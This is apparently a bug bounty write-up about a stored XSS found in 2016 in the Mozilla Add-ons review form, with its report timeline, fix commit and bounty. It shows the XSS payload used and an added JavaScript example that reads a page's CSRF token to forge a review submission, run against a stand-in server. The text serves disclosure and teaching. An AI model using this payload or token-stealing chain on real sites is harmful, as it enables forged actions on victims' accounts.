Hi,
I am Paresh Parmar
This is my first write-up.
So let's start.
On 2016-02-09 I was reading Ashar Javed's blog post: https://respectxss.blogspot.de/2016/01/persistent-xss-in-mozilla-add-ons-site.html
After reading that post, I set my target to the Mozilla Add-ons site: https://addons.mozilla.org/en-US/firefox/
Those were mobile and XSS days for me ;)
so I was hunting only mobile sites.
I was using this user-agent string:
Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
So let's go.
After setting up the target, I chose the review section endpoint for hunting.
For example: https://addons.mozilla.org/en-US/seamonkey/addon/mailbox-alert/reviews/
Here you can write a review about a particular add-on!
So I gave 5 stars to that add-on :p and in the review I wrote
"
<img src=x onerror=alert(document.domain)>
"
and submitted the review, and bOom!!! The XSS executed.

Within two minutes I had found this simple XSS.
I reported this issue at https://bugzilla.mozilla.org/
After reporting it, I started digging further.
Since the injected script runs on the same origin as the site, it can read the page's CSRF token, so the CSRF protection of that page can be bypassed via the XSS.
There are three steps to bypass a CSRF token using XSS:
1. First, request the form
2. Extract the valid CSRF token from the response
3. Submit the form using that valid CSRF token
The MDN reference for XMLHttpRequest is at https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequestReference, and here is a great worked example of using XSS to CSRF: https://rileykidd.com/2013/09/09/using-xss-to-csrf/
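Here is how those three steps look in code. This is an added example, not code from the original post, from Mozilla or from addons-server. The HTTP client is injected (in the browser it would be XMLHttpRequest or fetch, with the site's cookies attached automatically because the script runs on the site's own origin) so the chain can run offline against a constructed stand-in server; the review URL, the form field names and the hidden field name csrfmiddlewaretoken (Django's default) are assumptions, not details taken from the real AMO form.

```javascript
// Added example (not from the original post or from addons-server): the
// three-step XSS -> CSRF chain, with the HTTP client injected so it runs offline.
// Assumptions: the review URL, the form field names, and the hidden field name
// "csrfmiddlewaretoken" (Django's default).

// Read one attribute off a single HTML tag, accepting double-, single- or
// un-quoted values. Only the value inside the quotes is returned.
function attr(tag, attrName) {
  const re = new RegExp(
    "\\s" + attrName + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))",
    "i"
  );
  const m = tag.match(re);
  if (!m) return null;
  if (m[1] !== undefined) return m[1];
  if (m[2] !== undefined) return m[2];
  return m[3];
}

// Step 2: pull the CSRF token out of the form HTML. Attribute order and quoting
// vary between templates, so each <input> is inspected on its own.
function extractCsrfToken(html, fieldName = "csrfmiddlewaretoken") {
  const tags = html.match(/<input\b[^>]*>/gi) || [];
  for (const tag of tags) {
    if (attr(tag, "name") === fieldName) {
      const value = attr(tag, "value");
      if (value !== null) return value;
    }
  }
  return null;
}

// Steps 1-3 chained. `client` stands in for XMLHttpRequest/fetch:
// client.get(url) -> {status, body}, client.post(url, fields) -> {status, body}.
// Same-origin script can both send the victim's cookies AND read the GET
// response; a cross-origin attacker page can only do the first, which is why a
// token defence stops plain CSRF but not XSS-driven CSRF.
function submitReviewViaXss(client, reviewUrl, reviewFields) {
  const page = client.get(reviewUrl);                  // step 1: request the form
  if (page.status !== 200) throw new Error("could not load form: " + page.status);
  const token = extractCsrfToken(page.body);           // step 2: extract the token
  if (token === null) throw new Error("no CSRF token in form");
  const result = client.post(reviewUrl, {              // step 3: submit with it
    csrfmiddlewaretoken: token,
    ...reviewFields,
  });
  return { token, status: result.status };
}

// Constructed stand-in for the site (not the real AMO server): serves a form
// carrying the session's token on GET and rejects any POST whose token does not
// match, which is how a token-based CSRF defence behaves.
function makeFakeSite(sessionToken) {
  const calls = [];
  return {
    calls,
    client: {
      get(url) {
        calls.push({ method: "GET", url });
        const body =
          '<form method="post">' +
          '<input type="hidden" value="' + sessionToken + '" name="csrfmiddlewaretoken">' +
          '<textarea name="body"></textarea><input name="rating" type="number">' +
          "</form>";
        return { status: 200, body };
      },
      post(url, fields) {
        calls.push({ method: "POST", url, fields });
        const ok = fields.csrfmiddlewaretoken === sessionToken;
        return { status: ok ? 302 : 403, body: ok ? "" : "CSRF verification failed" };
      },
    },
  };
}

// Usage: what the onerror payload would do once it runs on the victim's origin.
// The token, URL and review text are placeholders.
const site = makeFakeSite("7f3a9c1d");
const outcome = submitReviewViaXss(
  site.client,
  "/en-US/firefox/addon/example-addon/reviews/add",
  { body: "Planted by XSS", rating: "5" }
);
console.log(outcome); // { token: '7f3a9c1d', status: 302 }
```

Note that a POST sent with a guessed token is still refused by the stand-in (403), so the token check itself is working; it is the same-origin read of the form in step 1 that defeats it.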
After only 12 hours they confirmed the issue, and in just 2 days they fixed it.
Here's the commit: https://github.com/mozilla/addons-server/commit/455132c9a104c6907e5208054d0e2187d5d90ca8
Regarding the bounty, I sent an email to security@mozilla.org along with the Bugzilla report ID and another PoC ;)
After a few days, I got this mail:

Here's the video PoC:
Timeline:
2016-02-09 13:35:54 PST - Report Sent
2016-02-10 07:10:17 PST - Confirmed
2016-02-11 08:53:31 PST - Fixed
2016-02-20 - Bounty awarded: $3000
Special thanks to the Mozilla Bug Bounty/Bugzilla team.